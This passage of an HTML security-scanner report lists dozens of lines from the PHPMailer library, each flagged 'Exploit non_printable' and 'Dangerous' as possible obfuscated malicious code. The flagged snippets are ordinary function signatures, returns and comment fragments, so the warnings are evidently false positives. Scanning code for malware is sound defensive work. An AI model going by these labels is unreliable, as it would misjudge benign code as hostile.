</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3601</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">] . </span><span style="color: #DD0000">' https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3603</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">[</span><span style="color: #0000BB">$key</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3605</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the key </span><span style="color: #007700">as </span><span style="color: #0000BB">a fallback</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3606</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$key</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3613</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True </span><span style="color: #007700">if </span><span style="color: #0000BB">an error did occur</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3615</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isError</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3617</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">error_count </span><span style="color: #007700">> </span><span style="color: #0000BB">0</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3627</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">fixEOL</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3635</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$nstr</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3647</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addCustomHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3658</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns all custom headers</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3661</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3663</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CustomHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3680</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string $message The transformed message Body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3682</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">msgHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$basedir </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3753</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">Body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">used a bundled advanced converter</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3766</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$html</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3768</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$converter</span><span style="color: #007700">-></span><span style="color: #0000BB">get_text</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">html2text</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3779</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$advanced</span><span style="color: #007700">, </span><span style="color: #0000BB">$html</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">html_entity_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string MIME type of file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3795</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3898</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$mimes</span><span style="color: #007700">[</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext</span><span style="color: #007700">)];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3900</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'application/octet-stream'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3910</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">filenameToType</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3918</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$pathinfo</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3925</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">pathinfo</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#107461</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3928</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">only the specified piece</span><span style="color: #007700">, </span><span style="color: #0000BB">allows </span><span style="color: #DD0000">'filename' </span><span style="color: #0000BB">to work on PHP </span><span style="color: #007700">< </span><span style="color: #0000BB">5.2</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3929</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3932</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mb_pathinfo</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3953</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'dirname'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3956</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'basename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3959</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3962</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'filename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3964</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3970</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function - </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s more verbose, less efficient, more error-prone and</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3982</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3999</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4001</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(array(</span><span style="color: #DD0000">"\r"</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n"</span><span style="color: #007700">), </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4014</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">normalizeBreaks</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype </span><span style="color: #007700">= </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4016</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/(\r\n|\r|\n)/ms'</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$cert_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_pass</span><span style="color: #007700">, </span><span style="color: #0000BB">$extracerts_filename </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4041</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_QP</span><span style="color: #007700">(</span><span style="color: #0000BB">$txt</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4052</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$line</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4060</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The DKIM signature value</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4062</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4082</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">base64_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$signature</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4108</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_HeaderC</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_BodyC</span><span style="color: #007700">(</span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4131</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Add</span><span style="color: #007700">(</span><span style="color: #0000BB">$headers_line</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4220</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
